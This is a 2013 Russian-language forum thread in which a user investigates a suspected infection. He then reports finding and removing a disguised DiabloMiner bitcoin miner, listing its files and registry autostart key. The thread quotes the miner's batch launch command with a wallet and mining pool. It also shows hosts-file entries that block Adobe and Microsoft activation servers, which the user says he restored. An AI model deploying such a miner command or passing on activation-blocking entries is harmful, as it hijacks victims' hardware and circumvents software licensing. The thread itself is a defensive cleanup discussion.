J()KER
3.2.2013, 19:20
Недавно зашел на сайт
А после этого опера иногда перестает понимать https (другие браузеры в это время с ними нормально дружат) помогает переподключение интернета. Подозреваю во всем файл windows\system32\lsass.exe (скрины прикрепил)
Помогите определить, кто шарит, вирус это или нет
Osta
3.2.2013, 20:10
Google Safebrowsing Malware site
https://www.virustotal.com/#url
Andy51
3.2.2013, 20:10
VINRARUS
3.2.2013, 20:12
У меня он тоже висит в процесах.
Claus398
3.2.2013, 20:21
у меня также(
J()KER
3.2.2013, 20:34
VINRARUS, Claus398, прекратить панику, он и должен висеть в процессах, так как это системная служба винды, просто на моей машине подозреваю что этот файл заражен
Osta, и что это значит?
Andy51, сказал что файл не заражен
еще прогоню cureit для надежности, посмотрю что он скажет
VINRARUS
3.2.2013, 21:14
Цитата(J()KER @ Сегодня, 22:34)
просто на моей машине подозреваю что этот файл заражен
дату изменения глянь (хотя умный вирус сделает все как нада
).
Цитата(J()KER @ Сегодня, 22:34)
прекратить панику
J()KER
4.2.2013, 4:50
Похоже отбой воздушной тревоги. CureIt тоже ничего не нашел, только удалил из файла hosts это
Код
127.0.0.1 validation.sls.microsoft.com
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
что я потом благополучно вернул на место)
J()KER
4.8.2013, 15:30
Месяц назад где-то подхватил на свой ноут DiabloMiner-Windows.exe немного замаскированный правда
Ничего не замечал, пока не обновил джаву - система даже в простое не снижала оборотов кулера. Полез в диспетчер задач и нашел виновника - java.exe, не долго думая удалил джаву и ребутнул ноут, после того как винда стартанула открылся браузер и предложил... скачать яву
.
Немного погуглив нашел человека с точно такой же траблой, как в его случае выяснилось во всем был виноват DiabloMiner-Windows.exe ( как я понял она считает биткоины, тоесть ктото за счет чужих мощностей пытается денюжку заработать). После прочтения форума откопал на харде ProcessExplorer, снова установил яву и ребутнул комп. Ситуация повторилась - java.exe загрузилось и начало нагружать проц и видеокарту. С помощью ProcessExplorer выяснил, что в моем слуыае орудует все тот же DiabloMiner-Windows.exe, только немного другой модификации
Вобщем, вот список файлов которые я у себя нашел и которые нужно удалять:
mtconf.exe
mtconf.ini
system.vbs
system.bat
И папку target
Все эти радости находятся в %WINDIR%\SysWOW64, на 32 битных системах искать нужно в %WINDIR%\System32
Также нужно удалить из автозагрузки (я не заморачивался и удалил CCleanerom) ключ реестра который сназывается Userinit и содержит путь "C:\Windows\system32\system.vbs"
И еще: вот содержание system.bat
Код
cd C:\Windows\system32\
mtconf.exe -u 1PcAyiafGF2kRKcUEfikqFaApfjY7vKwqo -o pool.50btc.com -r 8332 -v 2 -w 128 -f 400
1PcAyiafGF2kRKcUEfikqFaApfjY7vKwqo - это я так понимаю id пользователя, его по этому id найти никак нельзя и чем нибудь нашкодить?
______
PS. Не отключайте UAC =)
Venik
4.8.2013, 15:43
Цитата(J()KER @ Сегодня, 19:30)
1PcAyiafGF2kRKcUEfikqFaApfjY7vKwqo
Отличный пароль, кстати
J()KER
4.8.2013, 15:55
Venik, дарю
EXL
4.8.2013, 16:13
Цитата(J()KER @ Сегодня, 22:30)
PS. Не отключайте UAC =)
Не не отключайте UAC, а отключайте Java и Silverlight в вашем браузере.
Нажмите для просмотра прикрепленного файлаУ меня 1,5 года UAC и джава отключены, ни одного экзешника с веб-страниц еще не выполнилось.
Claus398
4.8.2013, 18:54
Цитата(EXL @ Сегодня, 19:13)
отключайте Java и Silverlight в вашем браузере.
а где смотреть это дело?
J()KER
4.8.2013, 19:06
Claus398, в опере (12) можно включить "Включать плагины только по запросу" на вкладке содержимое
J()KER
4.8.2013, 19:06
Claus398, в опере (12) можно включить "Включать плагины только по запросу" на вкладке содержимое
Claus398
4.8.2013, 19:17
спасибо большое. а в хроме смотреть в расширениях?
J()KER
4.8.2013, 19:21
Цитата(Claus398 @ Сегодня, 22:17)
а в хроме смотреть в расширениях?
хромом не пользуюсь, но думаю, что да. Впринципе, если тебе ява и тем более сильверлайт не нужны то лучше их просто удалить - дыр меньше будет
EXL
4.8.2013, 20:52
Цитата(J()KER @ Вчера, 22:30)
1PcAyiafGF2kRKcUEfikqFaApfjY7vKwqo - это я так понимаю id пользователя, его по этому id найти никак нельзя и чем нибудь нашкодить?
http://habrahabr.ru/post/123244/#comment_4046619Кстати, грузился только процессор? Или видеокарта тоже?
J()KER
4.8.2013, 21:59
EXL, спасиб. Проц процентов на 20 и видеокарта, не знаю на сколько точно, но прогревалась градусов до 85